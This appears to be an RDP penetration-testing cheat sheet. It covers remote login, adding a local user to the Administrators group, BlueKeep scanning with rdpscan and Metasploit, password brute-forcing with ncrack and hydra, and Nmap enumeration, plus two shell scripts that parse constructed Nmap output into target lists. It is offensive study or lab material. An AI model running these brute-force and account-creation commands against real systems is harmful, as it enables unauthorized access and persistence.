RDP 3389
1. RDP Login:
To log in to a remote machine over RDP:
Using rdesktop (older systems):
rdesktop -u DISCO 10.11.1.13
Using xfreerdp (modern, cross-platform; FreeRDP options use /name:value and +flag syntax, so the clipboard switch is written +clipboard with no space):
xfreerdp /u:admin /p:<password> /v:10.10.10.10 +clipboard
2. Add a User and Grant Privileges:
Create a user (from an elevated cmd.exe on the target):
net user redcliff password123 /add
Add the user to the Administrators group:
net localgroup Administrators redcliff /add
Add the user to the Remote Desktop Users group (this is what a non-admin account needs; members of Administrators already hold the "Allow log on through Remote Desktop Services" right by default):
net localgroup "Remote Desktop Users" redcliff /add
Verify with net user redcliff; local group memberships are listed at the end of the output.
3. RDP Vulnerability Scanning (BlueKeep, CVE-2019-0708):
Clone and build rdpscan, then point it at a target:
git clone https://github.com/robertdavidgraham/rdpscan.git
cd rdpscan && make
./rdpscan 10.10.10.10
Scan for BlueKeep with Metasploit: first, use Nmap to build a list of hosts with 3389/tcp open. Match on the open port rather than on "Status: Up", otherwise hosts that are alive but not running RDP end up in the list:
nmap -p3389 --open -T5 <subnet>/24 -oG - | awk '/3389\/open/{print $2}' > rdp.lst
Then run the BlueKeep scanner module against that list:
msfconsole
use auxiliary/scanner/rdp/cve_2019_0708_bluekeep
set RHOSTS file:<path to rdp.lst>
run
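The Nmap-to-Metasploit step above as a small, testable script. This is an added example, not code from the original page or from the rdpscan/Metasploit projects: it parses grepable (-oG) Nmap output and keeps only hosts whose 3389/tcp is reported open. The sample output and addresses are constructed for the demonstration; the live pipeline at the bottom is shown in a comment and uses <subnet> as a placeholder.

```shell
#!/bin/sh
# Added example (not from the original page): turn nmap grepable (-oG) output
# into the rdp.lst target list the BlueKeep scanner module consumes. Only
# hosts whose 3389/tcp is reported "open" are kept; a "Status: Up" line alone
# does not mean RDP is listening. The sample below is constructed in the
# shape of nmap -oG output (whitespace simplified); the addresses are made up.

SAMPLE_GNMAP='# Nmap 7.94 scan initiated (constructed sample)
Host: 10.10.10.10 () Status: Up
Host: 10.10.10.10 () Ports: 3389/open/tcp//ms-wbt-server///
Host: 10.10.10.11 () Status: Up
Host: 10.10.10.11 () Ports: 3389/closed/tcp//ms-wbt-server///
Host: 10.10.10.12 () Status: Up
Host: 10.10.10.12 () Ports: 3389/filtered/tcp//ms-wbt-server///
Host: 10.10.10.13 () Status: Up
Host: 10.10.10.13 () Ports: 3389/open/tcp//ms-wbt-server///
Host: 10.10.10.13 () Ports: 3389/open/tcp//ms-wbt-server///
# Nmap done (constructed sample)'

# rdp_hosts: read grepable nmap output on stdin and print one address per
# line for each host with 3389/tcp open. Duplicate host lines (re-scans,
# merged files) collapse to a single entry.
rdp_hosts() {
    awk '/Ports:/ && /3389\/open\/tcp/ { print $2 }' | sort -u
}

# rdp_host_count: number of RDP hosts in a grepable file, a quick sanity
# check before pointing the scanner at the list.
rdp_host_count() {
    rdp_hosts < "$1" | wc -l | tr -d ' '
}

# Live pipeline (not run here; <subnet> is a placeholder):
#   nmap -p3389 --open -T4 <subnet>/24 -oG - | rdp_hosts > rdp.lst
#   msfconsole -q -x "use auxiliary/scanner/rdp/cve_2019_0708_bluekeep; set RHOSTS file:$PWD/rdp.lst; run"

# Demonstration on the constructed sample:
SAMPLE_FILE=$(mktemp)
printf '%s\n' "$SAMPLE_GNMAP" > "$SAMPLE_FILE"
rdp_hosts < "$SAMPLE_FILE"
echo "hosts with RDP open: $(rdp_host_count "$SAMPLE_FILE")"
```

The filter keys on the Ports: record because Nmap writes the Status: and Ports: records for a host as separate lines; 10.10.10.11 and 10.10.10.12 are up but have the port closed or filtered and are dropped.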
4. Brute-Forcing RDP:
Brute-force RDP with ncrack (a single user against a small list, then a user against rockyou.txt on an explicit port):
ncrack -vv --user DISCO -P passwords.txt rdp://10.11.1.1
sudo ncrack -vv --user peter -P /usr/share/wordlists/rockyou.txt rdp://10.11.1.11:3389
Brute-force RDP with hydra (-L reads usernames from a file, -f stops after the first valid pair, -V prints every attempt):
hydra -V -f -L DISCO.txt -P passwords.txt rdp://10.11.1.13
Check the account lockout threshold before starting (net accounts on a domain-joined host shows it): failed RDP logons count against it, and a long wordlist against one account will lock the account rather than crack it. Each attempt is a full RDP connection, so keep parallelism low (hydra's -t option) to avoid dropped attempts being mistaken for wrong passwords.
5. Nmap RDP Enumeration Scripts:
RDP service enumeration: rdp-enum-encryption lists which security layers (Native RDP, SSL, CredSSP/NLA) and encryption levels the server accepts, rdp-ntlm-info pulls the hostname, domain and Windows build from the NTLM challenge without credentials, and rdp-vuln-ms12-020 checks for MS12-020 (CVE-2012-0002):
nmap --script "rdp-enum-encryption or rdp-vuln-ms12-020 or rdp-ntlm-info" -p 3389 -T4 10.11.1.1
Check for MS12-020 only:
nmap -sV -Pn --script=rdp-vuln-ms12-020 -p 3389 10.11.1.11
6. Microsoft Terminal Services (MS-WBT-SERVER):
Nmap service detection (-sV) labels port 3389 as ms-wbt-server, the Microsoft Terminal Services name for RDP. Pair it with rdp-ntlm-info to get the OS build (Product_Version) and computer/domain names, which is what you need to decide whether a host is in range for the vulnerability checks above:
nmap -sV -Pn --script "rdp-ntlm-info or rdp-vuln-ms12-020" -p 3389 10.11.1.11
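Across a whole subnet the useful question from sections 5 and 6 is which hosts accept Native RDP (standard RDP security, no NLA) and which still accept 40/56-bit RC4. The script below is an added example, not from the original page or from the Nmap project: it triages rdp-enum-encryption output into a host/finding table. The Nmap output it parses is constructed in the shape of Nmap's normal output (hosts, names and results are made up), and the reading that "Native RDP accepted" means NLA is not enforced follows from the script probing each requested protocol and reporting whether the server accepts it.

```shell
#!/bin/sh
# Added example, not from the original page: triage the output of
# nmap --script rdp-enum-encryption across many hosts. The script reports,
# per security layer and encryption level, whether the server accepted that
# negotiation. "Native RDP" (standard RDP security) accepted means the server
# does not require NLA, so its pre-authentication protocol surface (where
# BlueKeep lives) is reachable. The sample is constructed in the shape of
# nmap normal output; hosts and values are made up.

SAMPLE_NMAP='Nmap scan report for 10.11.1.1
PORT     STATE SERVICE
3389/tcp open  ms-wbt-server
| rdp-enum-encryption:
|   Security layer
|     CredSSP (NLA): SUCCESS
|     CredSSP with Early User Auth: SUCCESS
|     Native RDP: SUCCESS
|     RDSTLS: SUCCESS
|     SSL: SUCCESS
|   RDP Encryption level: Client Compatible
|     40-bit RC4: SUCCESS
|     56-bit RC4: SUCCESS
|     128-bit RC4: SUCCESS
|     FIPS 140-1: SUCCESS
|_  RDP Protocol Version:  RDP 10.7 server

Nmap scan report for dc01.corp.local (10.11.1.2)
PORT     STATE SERVICE
3389/tcp open  ms-wbt-server
| rdp-enum-encryption:
|   Security layer
|     CredSSP (NLA): SUCCESS
|     CredSSP with Early User Auth: SUCCESS
|     Native RDP: FAILED
|     RDSTLS: SUCCESS
|     SSL: FAILED
|_  RDP Protocol Version:  RDP 10.7 server'

# rdp_triage: read nmap normal output on stdin; print "<ip><TAB><finding>".
# Findings: nla-not-required (Native RDP accepted), nla-required (rejected),
# weak-rc4 (40- or 56-bit RC4 accepted). Anything other than SUCCESS on the
# Native RDP line counts as rejected, so the exact failure wording does not
# matter. The host is taken from the "Nmap scan report for" line; when Nmap
# prints "name (ip)" the parentheses are stripped to keep the ip.
rdp_triage() {
    awk '
        /^Nmap scan report for/ { host = $NF; gsub(/[()]/, "", host) }
        /Native RDP:/ {
            if ($0 ~ /SUCCESS/) print host "\tnla-not-required"
            else                print host "\tnla-required"
        }
        /(40|56)-bit RC4: SUCCESS/ { print host "\tweak-rc4" }
    ' | sort -u
}

# nla_not_required: only the addresses where NLA is not enforced, ready to
# feed to a BlueKeep check or a hardening ticket.
nla_not_required() {
    rdp_triage | awk -F'\t' '$2 == "nla-not-required" { print $1 }'
}

# Demonstration on the constructed sample:
printf '%s\n' "$SAMPLE_NMAP" | rdp_triage
```

Run it as nmap --script rdp-enum-encryption -p 3389 -iL rdp.lst | rdp_triage on real output; the second host in the sample is what a "Require NLA" server looks like, with both Native RDP and plain SSL rejected and only CredSSP accepted.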